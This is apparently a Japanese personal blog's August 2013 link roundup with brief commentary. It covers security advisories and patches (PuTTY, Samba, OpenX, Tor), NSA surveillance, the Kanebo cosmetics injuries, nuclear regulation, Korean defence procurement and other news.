荻上チキ氏のはだしのゲン閉架騒動について (togetter, 8/17)。荻上チキ氏のツイートのまとめ。
「ゲン」閲覧制限に抗議続々 (中国新聞, 8/18)
ワッシュ @washburn1975 氏のツイート:
ちなみに、松江市教委が問題視してる「首をはねたり、女性に乱暴したりする場面」てのは、卒業式で君が代を歌えと言われたゲンが、天皇の名の下に行われた軍の蛮行を告発する場面なんだよね。ウヨは以前からここを抹殺したがっていたんだよ。 pic.twitter.com/0svd0cW3EW
— ワッシュ (@washburn1975) August 16, 2013
》 Personalized Exploit Kit Targets Researchers (Krebs on Security, 8/15)
》 がん原因の遺伝子異常 新たに13種類 (gan, 8/15)
》 「核のゴミ」の安全性 14年ぶり検証へ (NHK「かぶん」ブログ, 8/12)
》 原子力規制委 津波対策の議論開始 (NHK「かぶん」ブログ, 8/14)
原子力規制委員会は、津波対策の本格的な議論を始め、北海道の泊原発と福井県の高浜原発について「検討が不十分だ」といった指摘をしました。
》 大飯原発4号機停止で全原発ゼロへ (NHK「かぶん」ブログ, 8/14)。大飯 3 号機は 9/2 に停止、4 号機も 9/15 に停止する予定。
》 atwikiを運営する有限会社アットフリークスは、各所に削除要請を出しているらしい (悪徳商法?マニアックス ココログ支店, 8/14)
》 CNN, Time and Washington Post redirect users to Syrian Electronic Army site (Sophos, 8/15)、 Washington PostやCNNにサイバー攻撃、「シリア電子軍」が犯行声明 (ITmedia, 8/16)
》 Gmailにもプライバシーはある(ただし, こんだけ) (techcrunch, 8/15)
》 Trsstは、ポスト・スノーデン時代の安全なTwitter(Kickstarter募集中) (techcrunch, 8/16)。ハァ……。
》 NSA cutting 90% of sysadmin jobs to beef up security (Sophos, 8/9)
》 ワシントンポスト:NSAはプライバシー規則を何千回も破っている。実害は不明 (techcrunch, 8/16)
》 視点・論点 「秘めたる力をひきだす"オノマトペ"」 (NHK 解説委員室, 8/16)
》 Windows 8 の共有で SMB 暗号化をオンにする (山市良のえぬなんとかわーるど, 8/9)。SMB 3.0 では SMB レベルでの通信路の暗号化を利用可能。 ただし、有効にすると SMB 2.1 以前にしか対応していないクライアントからは接続できない。
》 3D foot scanner reveals health risks for high-heel fashion slaves (reuters, 8/15)。3D 足スキャナがハイヒールの健康リスクを暴露する。
》 視点・論点 「中国・チベット 対話の行方」 (NHK 解説委員室, 8/13)
》 視点・論点 「アメリカ移民法改革の動向」 (NHK 解説委員室, 8/14)
先ほども触れましたように、アメリカでは2050年には白人が全国民の半数未満になると予測されています。そして、近年の大統領選挙の出口調査結果を見ると、図にありますように、民主党が中南米系やアジア系、黒人などの非白人、マイノリティの票を獲得できている一方で、共和党は白人の票に依存しており、マイノリティの票を獲得できていないことが明らかになっています。
(中略)
既に国内に多数居住する不法移民にどう対処するか、今後数が増大すると考えられる中南米系移民にどう対応するかは、移民国家アメリカのアイデンティティに関わる問題であるとともに、今後の大統領選挙の行方も左右する大問題だといえ、今後の動向に着目する必要があるといえます。
》 セキュア Web メールサービス Lavabit が運用を停止 (スノーデン氏ねた)
暗号化通信サービスが沈黙 (エフセキュアブログ, 8/9)
エドワード・スノーデン氏が使っていた、プライバシーに重点を置いたメールサービスが閉鎖された。
オーナー兼オペレータのLadar Levison氏は次のように述べている。
(中略)
この経験は私にとって非常に重要な教訓となった。アメリカ議会の行動や強力な判例がない限り、米国と物理的に繋がっている企業に個人的なデータを預けることは「強く」お勧めしない。
Secure webmail service Lavabit suspends operation, citing legal issues (Sophos, 8/9)
Snowdenが使っていたとされるメールプロバイダが突然閉鎖, アメリカ企業を信ずるなとメッセージを遺す (techcrunch, 8/9)
》 BlackHat 2013 - セキュリティカメラのハッキング (エフセキュアブログ, 8/16)
》 Facebookを使っていなくても勝手に作成されている「シャドープロファイル」とは (gigazine, 8/14)
》 視点・論点 「昆虫と振動」 (NHK 解説委員室, 8/9)
》 半沢直樹が面白い理由 (Nothing Ventured, Nothing Gained., 8/13)。主に配役について。
半沢直樹が面白い理由であるが、これは既に色々指摘されており、大方その見方に同意するが、私は、1番の理由は、「キャスティングの本物さ」ではないかと思う。
》 震災ビッグデータII 被災地企業12万社からたどる復興の未来地図(仮) (NHK スペシャル, 9/8 放送予定)
》 MEGAQUAKE III 巨大地震 第4回 南海トラフ 見え始めた"予兆"(仮) (NHK スペシャル, 9/1 放送予定)
》 電話帳流出が可能な権限を持つアプリを一覧表示して注意をうながす「流出注意報」 (gigazine, 8/16)
》 【訃報】「青空文庫」の創設者である富田倫生さんが死去 (gigazine, 8/16)。合掌。
》 「ドッコイセ福知山花火大会」の屋台爆発事故前後の状況がわかるムービー (gigazine, 8/16)
》 次はガラパゴス諸島とヴェネツィア、Googleストリートビュー対応の名所がどんどん増加中 (gigazine, 8/15)。ヴェネツィア! ヴェネツィア!! ヴェネツィア!!!
》 盗まれたiPhoneを探してエクアドルの「泥棒市」に行ってきた (gigazine, 8/16)
》 善良なハッカーは存在する? (エフセキュアブログ, 8/13)
》 シリア難民が大量にイラク北部へ (国連情報誌SUNブログ対応版, 8/17)
》 偽の「F-Secure Security Pack」という悪意あるブラウザ拡張について (エフセキュアブログ, 8/7)
》 ハッカーの攻撃対象者リスト上にAppleの開発者が? (エフセキュアブログ, 8/6)
》 DNS servers hijacked in the Netherlands (SANS ISC, 8/8)
》 .GOV zones may not resolve due to DNSSEC problems. (SANS ISC, 8/14)。現在は修正されている。
》 Introducing FuzzDB (Mozilla Security Blog, 8/16)
》 Joint Statement by CNCERT/CC, JPCERT/CC and KrCERT/CC on the First China-Japan-Korea CSIRT Annual Meeting for Cybersecurity Incident Response (JPCERT/CC, 8/9)
》 Miss Teen USA 2013 says sextortionist hacked webcam to snap bedroom photos (Sophos, 8/15)。Webcam による盗撮被害。
物理的な鍵の 3D コピー (シマンテック, 8/12)
先々週に相次いで開催されたセキュリティカンファレンス OHM2013 と DEFCON では、錠前破り(ピッキング)に関して類似のプレゼンテーションが 2 つ行われました。どちらも、物理的な鍵の複製を 3D プリンタで作成できることを実証したもので、必要なのは元の鍵の ID 番号と、精巧な写真数枚だけです。たったそれだけで、実際に使える 3D モデルの鍵を複製できてしまうというのは、考えるだけでも心配です。3D モデルのファイルの一部は、一般に入手可能で、変更も改造も簡単です。
Aussie ATM criminals embrace 3D printers for cashpoint crimes (Sophos, 8/16)。3D プリンターでつくった ATM スキマーが実際に使われたそうで。
白斑 公表遅れで拡大の可能性 (NHK「かぶん」ブログ, 8/6)
白斑対策遅れ 消費者庁が批判 (NHK「かぶん」ブログ, 8/7)
白斑被害はカネボウだけの問題なのか 厚労省”お墨付き”、医薬部外品の大事故は2度目 (東洋経済, 8/8)
WEB特集・「白斑」 不十分な安全試験 (NHK「かぶん」ブログ, 8/16)
今回の化粧品の安全性の試験は、販売前、十分に行われたのでしょうか。
カネボウ化粧品によりますと、白斑の症状が出ないかどうか、美白成分を通常の濃度の2倍にしたものを大人の男女合わせて12人の手の甲に1日1回、6か月間塗る試験を行ったということです。
また、問題の美白成分を含む化粧品を併用する場合も考えて、化粧水と乳液を2か月間、併せて使う試験も行いました。
その結果、白斑などが起きることはなかったということです。
ところが、NHKが取材したところ、実際の使われ方として多い、化粧水と乳液に加え、ナイトクリームやマスクといった3種類以上を併せて使う試験は行っていなかったことが分かりました。
問題となった化粧品についてカネボウ化粧品は、「化粧水」、「乳液」、「ナイトクリーム」、「顔に貼るマスク」、「日焼け止め」の5種類をシリーズ商品として販売し、併用すれば、より効果が得られると推奨していました。
時論公論 「"美白"化粧品 なぜ被害が起きたのか」 (NHK 解説委員室, 8/14)
》 ブラック企業大賞2013、大賞はワタミフードサービス (slashdot.jp, 8/16)
》 ブロンコビリーがバイト撮影問題を起こした足立梅島店を閉店 バイト店員に損害賠償請求も (産経, 8/12)、 店舗退店に関するお知らせ (ブロンコビリー IR 情報 / 宝印刷, 8/12)。閉店する必要ないだろ……。
》 サラダボウル:少女像への国際的視線=堀山明子 (毎日, 8/5)
米国は軍隊内の性暴力撲滅運動の真っ最中。「日本だけが悪い」とはだれも言っていない。むしろユダヤ系、アルメニア系、性暴力に悩む女性が時空や経緯を超え、それぞれ身近な事件と絡め、元慰安婦の痛みに共鳴しているというのが今の構図だ。被害者の傷と向き合う普遍的な言葉でなければ、米社会では届かないだろう。
》 【PC遠隔操作事件】「真犯人」からのラストメッセージ (江川 紹子 / Yahoo, 8/10)
【PC遠隔操作事件】ラストメッセージ全文(上) (江川 紹子 / Yahoo, 8/10)
・新聞紙
「予告犯」という漫画を読んで、とても共感を覚えました。
特に、登場人物の犯人グループの一人である「ゲイツ」君の境遇には自分と重ね合わせできるものがありました。(11月に入ってからはじめて単行本で読んだので、このマンガに感化されて一連の事件を起こしたというわけではありません。念のため)
その作品に出てきた、新聞紙を使う手口をちょっとだけ真似てみたというわけです。
これですか: 「予告犯」筒井哲也 (ジャンプ改)
余談になります。基本的に面会取材は一切受けるつもりは無かったのですが、英国のBBCの方から取材依頼のメールが来たとき、ちょっとだけ気持ちが動きました。
以前見た「ポチの告白」という映画を思い出したのです。
関連: 警察組織の腐敗をテーマにした映画「ポチの告白」の高橋玄監督にインタビューしてみた (gigazine, 2010.04.08)
■目的通りに誤認逮捕を招き、警察・検察が謝罪しているが、今どのように感じているか
警察官や検察官はもっと人並みに、人の話をちゃんと聞く姿勢があれば1件も誤認逮捕など起こさなかったのでは?と。
あの人たちはコミュニケーション能力以前の問題、日本語というか地球語が通じない宇宙人です。
彼らにそういう能力が無いことを分かっていて試した私も私ですが。
結合試験のテストパターンを作って流したら再現性のあるバグの結果が得られた、そんな感想です。
テスト結果を全国に、全世界に提示できたことは大変有意義だと思います。
そういう感想ですか……。
【PC遠隔操作事件】ラストメッセージ全文(下) (江川 紹子 / Yahoo, 8/10)
JVNVU#95005184: Dell の BIOS 更新処理にバッファオーバーフローの脆弱性 (JVN, 2013.08.16)。Latitude と Precision。更新版 BIOS が用意されている。 Black Hat USA 2013 ねたみたい。 CVE-2013-3582
JVN#21103639: サイボウズ メールワイズにおける情報漏えいの脆弱性 (JVN, 2013.08.13)。更新版 5.0.6 が用意されている。
Cisco TelePresence System Default Credentials Vulnerability (Cisco, 2013.08.09 更新)
HP Switches? You may want to look at patching them. (SANS ISC, 2013.08.09)
Security advisories: Contributed projects (drupal.org)。2013.08.07 付で 5 件、2013.08.14 付で 3 件記載されている。
Security Advisory: Two Vulnerabilities in NetworkMiner (NETRESEC, 2013.08.07)
Blaster - 3654日後 (エフセキュアブログ, 2013.08.12)
》 エレべーター事故 独自調査へ (NHK, 8/9)。消費者庁の消費者安全調査委員会。国土交通省が行った調査だけでは不足なことがわかったので、消費者安全法第 24 条 3 項に基づいて、消費者安全調査委員会も独自に調査するという話。
報告書・評価書 (消費者安全調査委員会)。8/9 付でエレベーター事故の評価書が公開されている。
がんばれ。
》 CMSの脆弱性を悪用するスパムボット「Stealrat」による感染を確認するには? (トレンドマイクロ セキュリティ blog, 8/7)
カネボウ美白化粧品回収、「コンプライアンスの失敗」か「クライシスマネジメントの失敗」か (郷原信郎が斬る, 7/7)
カネボウ美白化粧品問題、「花王の判断」は正しかったのか? (郷原信郎が斬る, 8/2)
「カネボウ美白化粧品」、なぜか話題にされない“3つの重要な論点” (郷原信郎が斬る, 8/9)。
この問題に関しては、重要な3つの論点についての議論が抜け落ちている。
第一に、カネボウ化粧品の美白化粧品を使用した2424人について「3箇所以上の白斑」「5cm以上の白斑」「顔に明らかな白斑」のいずれかの症状があり、2125人にこれら以外の症状があることが確認されているが(8月9日カネボウリリース)、これらの「白斑様症状」の中のどれだけの数が、他の原因ではなく「ロドデノール」によって発症したものなのかが不明だという点である。
第二に、「ロドデノール」以外の他の美白化粧品について、同様の「白斑様症状」が発生していないのかという点。
第三に、今回の問題について、「ロドデノール」を医薬部外品として承認した厚生労働省にも責任があるのではないかという点である。
》 MERS ヒトコブラクダ間で感染拡大 (NHK, 8/9)。うぉぅ。宿主はラクダなのか?! さらなる調査が必要な模様。
》 取引される少女たち、欧州人身売買の実態 (JBpress, 7/22)
国際労働機関(ILO)の2012年のリポートによると、強制的な労働に従事させられている人は世界に2090万人おり、うち22%に当たる450万人が性的な労働を強制されている。そのうち21%が17歳以下だ。
また、驚いたのだが、このリポートによると強制労働に従事させられている人の人口比における地域別の統計を見ると、最多はアジアでもアフリカでも中東でもなく、旧ソ連圏(CIS)とEUに加盟していない欧州国が一番多い*8。
》 ネット取引で「失われる」消費税 (NHK, 8/9)。国外企業からネットサービスを買うと、消費税がつかないという話。広告、クラウド、音楽、電子書籍など。
この問題、すでに対策を取っている例もあります。 EUでは、外国の企業が国内向けに電子書籍などを販売する場合、税務当局に登録を義務づけ、国内企業と同じように消費税を徴収する法制度を、すでに2003年に導入しています。 日本では、財務省が去年、検討会を設置し、EUを参考にした課税方式を検討しています。
》 じゃらんnetへの「なりすましログイン」検知のご報告とパスワード変更のお願い (じゃらん, 8/7)。先日の GREE と同様、流出アカウント情報に基づく攻撃だった模様。
第三者が外部から不正に取得したID・パスワードを使用し、本人になりすまして不正にログインする事象が、8月5日に判明いたしました。
(中略)
不正ログインが確認された期間:2月14日〜16日、6月3日〜15日
不正ログインが確認されたID数:27,620件
参照された可能性のあるお客様情報:氏名、住所、電話番号、メールアドレス、予約履歴
Benjamin さん情報ありがとうございます。関連:
「じゃらんnet」情報流出か (NHK, 8/9)
ことし2月と6月、IDとパスワードの入力を試す不正なアクセスが合わせて138万回繰り返されていたことが分かりました。
このうち2万8000人分は実際にログインされ、名前や住所の個人情報のほかホテルの予約履歴などが外部に流出したおそれがあるということです。
さらにおよそ260人のIDは勝手に改ざんされていたことも分かりました。
パスワードでセキュリティを確保する時代の終焉が近いのでしょうか (山本 一郎 / Yahoo, 8/9)
まだまだ続く不正ログイン事件 (セキュリティは楽しいかね? Part 2, 8/2)
》 DAYS JAPANが出したインド、ヴェトナム、トルコで出した意見広告 (爆発後の日々, 8/7)
》 大阪府警:誤認逮捕やまず 高槻署、迷惑防止条例違反容疑 (毎日, 8/9)
男性は関与を否定したが、親子が「この人で間違いない」と説明したため、午後6時35分に現行犯逮捕し、同署に移送した。ところが、母親が実際は容疑者の姿を見ていなかったことなどが判明し、男性を釈放した。
被害者証言はかようにアテにならない (ことがある) と。
》 潮、婦人公論、文藝春秋、ダイヤモンド、新潮、ウェッジ…原発広告漬けのダメ雑誌ランキング (MyNewsJapan, 2011.08.10)
》 福岡警官汚職:数年前から情報漏えいか (毎日, 8/7)
千代原容疑者の逮捕容疑は、一般市民の住所や車検証に登録されている情報を管理している県警の照会システムを使い、個人情報を鳥羽容疑者に提供し、その見返りと知りながら、鳥羽容疑者に1月下旬〜5月下旬、10回にわたり計15万8000円を振り込ませたとしている。
県警によると、県警が管理している個人情報の照会システムは捜査部門の警察官であれば誰でも利用できる。千代原容疑者は部下に指示して照会システムで個人情報を閲覧していたという。照会履歴は1カ月に1回、千代原容疑者の上司にあたる警部が確認する仕組みだったが、異常に気付かなかったという。
》 パスワードの定期的変更について徳丸さんに聞いてみた(2) (徳丸浩の日記, 8/8)
》 「水飲み場型攻撃」って,ピンとこないよね (wakatonoの戯れメモ, 8/7)。まあピンとこないわけですが、 水飲み場 = みんなが定期的に訪れる場所に罠を仕掛けて待ち伏せるわけで、 個人的にはむしろ「うまいこと言うなあ」と思ったり。 まあ、説明されないとピンとこないわけですが。 あと APT については、最近の Microsoft さんの「高度で執拗な攻撃」という訳が好きです。
》 厚生労働省が「ブラック企業」取り締まりをスタート、9月から立ち入り調査を実施 (gigazine, 8/8)。ただしワタミは除外、だったりするのかな。
》 Bitcoinへの弾圧は続く。米連邦裁判所が「通貨」と認定 (techcrunch, 8/8)
》 ウイルスは復活しているのか? (日本のセキュリティチーム, 8/8)。ファイル感染型の話。
》 もんじゅ君の「ズバリ聞きますだよ!」第4回 - 【前編】じぇじぇ!大友さん、『あまちゃん』は2011年夏の福島から始まっていた、ってどういう意味ですか? (BLOGOS, 8/9)。選挙カー問題など。
》 MS、Office 2010のSP2を公開 (マイナビニュース, 7/24)。出てたの知らんかった。
》 在日中国人教授と連絡取れず=先月下旬上海に、「拘束情報」も—朱東洋学園大教授 (時事, 8/9)
複数の関係者は「中国当局に拘束されたもようだが、状況は分からない」と明かした。
》 いつも一言多いあのアナウンサーのちょっとめったに聞けない話 (小学館, 8/30 発売)。元フジテレビの長谷川豊氏。「創」2013年9・10月号 p.70 によると、「5月20日に入稿したんですけど、内容をめぐって小学館の法務部と最近までケンカしていました」そうで。
FileZilla 3.7.3 が公開されました。PuTTY 0.63 の CVE-2013-4206 CVE-2013-4207 CVE-2013-4208 への対応がマージされたそうです。iida さん情報ありがとうございます。
計 8 件、緊急 x 3、重要 x 5。IE あり、Exchange あり (どちらも緊急)。
ところで、
このセキュリティ情報の事前通知は、2013 年 8 月 14 日に「7 月のセキュリティ情報」に置き換わります。
それはないと思うし……。……あ、直った。
関連: 2013 年 8 月 14 日のセキュリティ リリース予定 (月例) (日本のセキュリティチーム, 2013.08.09)
》 【重要】不正ログイン発生のご報告とアカウントの一時停止について(8/8更新) (GREE, 8/6)。7/25〜8/5。
今回の不正ログインは、昨今頻発している一連の不正アクセスと手法が類似しており、他社サービスから流出した可能性のあるメールアドレス / パスワードを利用した不正なアクセスと考えられます。
》 Ji2 フォレンジック・チャレンジ 2013 夏 〜 君は、フォレンジックの世界を見たくないか? (ji2)。2013.09.06 (金)、東京都新宿区、無料。 「参加条件: 18歳以上の学生 (ただし社会人学生は除く)」。交通費補助あり。
》 緊急地震速報 電気的「ノイズ」影響か (NHK, 8/8)。緊急地震速報「M7.8」誤報の件。
気象庁が観測データを調べた結果、和歌山県北部で地震が発生したのとほぼ同じころ、東海沖に設置されている海底地震計で、地震とは異なる、「ノイズ」と呼ばれる電気的な雑信号が検知されていたことがわかりました。
緊急地震速報のシステムは、離れた場所でほぼ同時に揺れなどのデータが観測されると、地震の規模や揺れを実際よりも大きく予測することがあります。
気象庁は、離れた地域で検知された電気的な「ノイズ」の影響で、システムが地震の規模を見誤った可能性があるとみて、原因を調べています。
一定量の誤報は仕方ないシステムなので、誤報のときは「抜きうち訓練」だったと思いませう。
》 「セキュリティキャンプ2013開催に向けて」 (FFRI Blog, 8/7)
》 中部電が三菱商の新電力会社買収で合意、首都圏で電力販売を検討 (ロイター, 8/7)。この一歩は小さな一歩だが、……。
》 【TIPS】 VSE 8.x オンアクセススキャンのタイムアウトについて (マカフィー, 8/7)。オンアクセススキャンがどのように機能するかの解説。
》 ブログは「言いたいことがある人だけ生き残る」マラソンレース (Hagex-day.info, 8/6)
ブログで大切なのは「何か言いたいことがある!」の有無なんだよな。
うん。blog なんて、passion ない人が無理して書くもんじゃないと思う。
PuTTYjp、0.63 ベースのものが公開されました。
》 焦点:「クリーン」なNZに汚点、乳製品問題で揺らぐ食の安全 (ロイター, 8/7)。関連:
中国とロシア、フォンテラ乳製品の輸入を停止—NZ貿易相 (ブルームバーグ, 8/5)
乳製品の細菌汚染問題、NZ政府がフォンテラ社の対応を調査 (AFPBB, 8/7)
》 夏休みを安全に過ごす11のポイント (エフセキュアブログ, 8/6)
11. 覚えておくべき基本ルール:公衆無線LANで行うことはすべて、公共の場での会話と同様であると考えること
》 日本でもiOS / Androidアプリにより2段階認証が使えるようになりました (徳丸浩のtumblr, 8/7)
》 くらし☆解説 「風疹対策 いま必要なこと」 (NHK 解説委員室, 8/7)
》 時論公論 「日韓関係に司法の壁」 (NHK 解説委員室, 8/1)
韓国の法体系や司法制度は日本と似通っており、法の運用や司法のあり方も日本や欧米諸国と同様に、秩序だって合理的なものというのが一般的な認識です。
しかしその一方で、韓国の司法は政治的な色合いが強く、世論に迎合しやすいという指摘もあります。裁判官が国会の人事聴聞会で承認を拒否されたり、ネットを通じて市民から直接、名指しで誹謗中傷を受けたりすることも珍しくありません。また大統領による特赦が乱発されるのも韓国の特徴です。イ・ミョンバク前大統領が、植民地支配が終わった日に合わせて一度に34万人に特赦を与えたこともありました。
韓国、日本のシーレーン攻撃用大型潜水艦9隻を整備へ (環球閑話時事の徒然 IZA見参, 8/6)。 韓国海軍 3千トン級潜水艦9隻を戦力化へ (聯合ニュース, 8/4) の件。
日本やオーストラリアが大型通常動力潜水艦を整備する理由は、長距離の連続航路防衛や長期間の海峡防衛、あるいは長期間に亘る敵交通線攻撃を意図しているからに他なりません。
それと同様の意図を持つと言う事は、平たく言えば、韓国が北朝鮮ではなく、太平洋や日本海で相手と戦う事、つまり日本が相手という事になります。(中国を相手にする場合は、現在整備されているソン・ウォンイル級がベストの選択であると思われます。)
ハァ……何やってんだ韓国……。
【韓国軍事】空中給油機4機を2017年から導入へ (大艦巨砲主義!, 8/6)。 韓国軍 空中給油機4機を2017年から導入へ (聯合ニュース, 8/6) の件。
空軍は戦闘機に燃料を満タンに搭載し独島や済州島の南方上空に出撃した場合、作戦時間が5〜30分に過ぎなかった弱点を補完するため、空中で燃料を補給できる空中給油機の導入を進めてきた。
昨年、国防部は2013年の国防予算に空中給油機導入予算として467億ウォンを計上したが、企画財政部が政府予算案を確定する過程でこの予算を全額削除した。
国防部は2014年の国防予算にも昨年と同規模の空中給油機導入予算を計上し、先ごろ企画財政部に提出した。
ハァ……何やってんだ韓国……。
韓国空軍次期戦闘機の入札が中断、価格クリアできず (中央日報, 7/8)
防衛事業庁のペク・ユンヒョン報道官は7日、「先月18日から今月5日まで候補企業3社と50回余りにわたり価格入札を進めたが予算範囲(8兆3000億ウォン)を満たす業者はなかった。現在の状況で入札を進めるのは無意味だ」と明らかにした。
F-15SE、F-35A、ユーロファイターいずれも予算超過だそうで。 F-35A はともかく、F-15SE やユーロファイターでも超過ですか……。 空中給油機買うっていうレベルじゃないよ……。 ハァ……何やってんだ韓国……。
つづき: 次期戦闘機導入事業 「ラスト入札」実施へ=韓国 (聯合ニュース, 8/5)
同庁関係者は5日、「祝日の15日を除く13日から16日までの3日間、次期戦闘機の入札を行う」と明らかにした上で、今回の入札で1機種でも事業費予算(8兆3000億ウォン=約7344億円)に収まれば、次の段階である機種決定評価に進むと話した。
》 祝 強襲揚陸艦「いずも」進水 (環球閑話時事の徒然 IZA見参, 8/7)
》 ヘリ空母型護衛艦「いずも」進水。同時に中国国産空母建造開始の情報も (海国防衛ジャーナル, 8/6)
》 NSA 方面 (PRISM、Verizon 通話記録収集等)
CIA の Prism と Big Data : 作り方を 見積つきで 教えましょう (Agile Cat - in the cloud, 8/6)。 「ヒント:$4.56 trillion ということはない」 の $4.56 trillion というのは、The stupidest quote yet on the entire PRISM spy scandal (venturebeat.com, 6/12) で引用されている、James Foster 氏の発言「would be 20 percent greater than the entire U.S. Federal budget」 によるものみたい。2013 年の United States federal budget は $3.8 trillion なので、20% 増しだと $4.56 trillion。
Secret Surveillance Puts Internet Governance System at Risk (Michael Geist, 8/2)
米国:NSAの長官が通信傍受に関して2009年に多くの過ちがあったことを認めたようだ (サイバー法ブログ, 7/21)
Exclusive: U.S. directs agents to cover up program used to investigate Americans (reuters, 8/5)
》 子供のネット依存、治療に当たる久里浜医療センター院長が「生易しい問題ではない」と警告 (日経 IT Pro, 7/25)
樋口院長のもともとの専門であるアルコール依存や薬物依存、たばこ(ニコチン)依存などは、依存対象の摂取をやめることが1つの明確なゴールになる。しかもこれらの依存は続けると確実に体を蝕むので、本人が依存を自覚しやすい。
ところが新しく浮上してきたネット依存は、ゴールが設定しにくい。今後、私たちの生活からネットがなくなることはなく、むしろどんどん密着していく。便利なサービスは使っていかなければならない。そうした環境のなかで、例えばゲームだけを遮断するのは容易ではない。「利用するサービスを限定するとか、使う時間帯を決めるとか、うまく付き合っていかなければなりません」。
依存する人が大人ではなく、子供なのもネット依存の特徴だ。「これまでアルコール依存や薬物依存は、主におじさん(中高年)の問題だった」。だがネット依存は大半が子供。治療を難しくしているのは、その子供たちの自覚の少なさだ。
(中略)
実はいかなる依存症の治療も、出発点は「本人の自覚」からと樋口院長は指摘する。「本人の自覚なしに、単にゲームを取り上げても暴れるだけ。何の解決にもなりません」。入院するにしても、やはり本人の自覚がないとうまくいかないのは、過去の依存症治療から明らかである。
(中略)
クラブ活動を始める、アルバイトに精を出す、興味が持てる学校に入り直すなど、ゲーム以外のアクティビティーに目を向けてもらうのが肝心だ。それがネット依存から抜け出す転機になる。ある子供は音楽の世界に関心を移し、ネット依存から脱却した。
関連:
「ネット依存の中高生が約52万人」の波紋、スマホで増幅される依存の連鎖 (日経 IT Pro, 8/7)
視点・論点 「つながらない価値」 (NHK 解説委員室, 7/31)
》 U字ロック、ひもで解錠し侵入 強姦未遂容疑で男再逮捕 (朝日, 8/5)。「方法はネットで調べた」。関連:
ドア (YouTube)。開け方映像。
輪ゴム一本でチェーンロックされたドアを突破する方法 (gigazine, 2010.04.06)
》 鳥インフルエンザ(H7N9)のヒト-ヒト感染を世界で初めて確認 —英医学誌 (ガジェット速報, 8/7)、 Father Most Likely Gave Avian Flu to Daughter (MedPage Today, 8/6)。中国方面。
》 キングソフトさんが徳丸先生の記事を読んで反面教師的にパスワード定期変更の無意味さを轟かせる (NAVER まとめ, 8/6)
》 Facebookの「いいね!」大量生産するダッカのクリック工場 (木村 正人 / Yahoo, 8/6)。粗製濫造。
この工場ではFacebookのいいね!は1千人分で15ドル、YouTubeは1千ビューで3ドルだ。3〜4時間もすれば、いいね!が1千人分増えている。
関連: 「いいね!」件数水増し…「消費者誤認」指摘も (読売, 7/27)
東京都内の会社が運営する会員制サイトは、「いいね!」を増やしたい企業と、小遣いを稼ぎたい人の橋渡しをする。登録企業は約100社で、数十万〜数百万円の広告料を払う。会員は1クリックで10円程度に交換可能なポイントをもらえる。約350万人いる会員の大半は主婦という。
》 首相はフクシマ触れず 配布原稿には明記、広島市での式典あいさつ (西日本新聞, 8/7)
今回、報道機関に配られたあいさつ文書には「一昨年、原子力災害を経た者として、原子力の最も安全な利用を世界に先駆けていく責めを負うところとなった」との一文があったが、首相はこの部分を読まなかった。
うへえ。
式典後、官邸関係者は「もともと原稿に入れる予定もなく、完全な手違い」と説明。
オイオイ、「もともと原稿に入れる予定もなく」はあり得んだろ。
》 沖縄キャンプ・ハンセンで HH-60 が墜落、乗員 1 名死亡
沖縄で米軍が一方的に飛行制限 (NHK, 8/7)。US 俺様正義が炸裂。
国土交通省によりますと、アメリカ軍が、6日午前10時以降、現場から半径およそ11キロ、上空3キロにわたって、一方的に、民間機の飛行を制限していたことが分かりました。
(中略)
この空域の管制は、3年前の平成22年にアメリカから日本に返還され、現在は、国土交通省が航空管制を行っていて、民間機への飛行制限などの通報は、日本が一元的に実施しています。
しかし、今回、アメリカ軍から事前の調整は全くなかったということで、国土交通省は、手続きに問題があり、飛行制限に根拠はないとしています。
米軍ヘリ墜落事故 広がる波紋 (NHK, 8/6)
》 JR 枇杷島駅でのホーム転落死事故、原因は歩きスマホとの情報あり
【原因は歩きスマホ】JR枇杷島駅で発生した人身事故を目撃した人の証言が異常に生々しい (日刊時事ニュース, 8/7)。「ぐちゃ ばりばりばり」「車内アナウンスを聞く限りでは、ケータイ(スマホ)を操作していてホームから転落したみたい」
JR枇杷島駅でホーム転落死亡事故、原因は自殺?歩きスマホ?駅では先月も死亡事故起きていた (NAVER まとめ, 8/7)
JR枇杷島駅で女性はねられ死亡 通勤客に影響 (中日, 8/7)
JVNDB-2013-003654: Samba の smbd における整数オーバーフローの脆弱性 (JVN, 2013.08.07)、 CVE-2013-4124: Denial of service - CPU loop and memory allocation (samba.org)。Samba 3.5.22 / 3.6.17 / 4.0.8 で修正されている。旧版への patch もある。 CVE-2013-4124
JVN#44035194: ドコモ海外利用アプリにおける接続処理に関する脆弱性 (JVN, 2013.08.07)。 2012.12.10 に修正されていたのだそうで。
Cisco Releases Multiple Security Advisories (US-CERT, 2013.08.05)
Chrome’s insane password security strategy (elliottkember.com, 2013.08.06)。Chrome をインストールして Safari から import すると、保存されたパスワードを容易に確認できるようになるという話。 そういう機能。
Advisory (ICSA-13-217-02): Schneider Electric Vijeo Citect, CitectSCADA, PowerLogic SCADA Vulnerability (ICS-CERT, 2013.08.06)
マイクロソフト セキュリティ アドバイザリ (2876146) ワイヤレス PEAP-MS-CHAPv2 認証により、情報漏えいが起こる可能性がある (Microsoft, 2013.08.04)、 Windows Phones open to hackers when connecting to rogue Wi-Fi (ZDNet, 2013.08.06)。推奨されるアクションとしては、「Windows Phone 8 デバイスから 認証プロセスを開始する前に、証明書によるワイヤレス アクセス ポイントの確認を 必須とするように設定する」だそうです。
PuTTY 0.63 登場。0.62 以前に存在した 4 つのセキュリティ欠陥が修正されています。 CVE-2013-4206 CVE-2013-4207 CVE-2013-4208 CVE-2013-4852
iceiv+putty は 0.63 ベースのものが配布されています。PuTTYjp はまだみたい。
PuTTYjp、0.63 ベースのものが公開されました。
FileZilla 3.7.3 が公開されました。PuTTY 0.63 の CVE-2013-4206 CVE-2013-4207 CVE-2013-4208 への対応がマージされたそうです。iida さん情報ありがとうございます。
PuTTY 0.63 に対応した WinSCP 5.1.7 が 2013.08.14 に公開されてました。
関連:
Important Update for OpenX Source 2.8.10 Users (OpenX Blog, 2013.08.06)。修正版 OpenX Source v. 2.8.11 がリリースされました。
OpenX Security Advisory, 2013/8/6 (OpenX, 2013.08.06)
OpenX ad servers "pre-compromised" - official distro contained remote code backdoor (Sophos, 2013.08.07)
関連:
Tor Browser attacked, users should update software immediately (EFF, 2013.08.06)
Tor does not provide automatic security updates. Instead, the Tor Browser currently requires users to manually download and install the update of the Tor Browser Bundle. The Tor Project is working on a fix for this, and this attack highlights the importance of allowing users to auto-update.
Tor Browser、自動アップデート機能はまだないのですね。
Tor の匿名性が攻撃される (シマンテック, 2013.08.07)
うえのさんから (情報ありがとうございます)
表記の記事、ニュースソースは
https://www.trustwave.com/spiderlabs/advisories/TWSL2013-020.txt
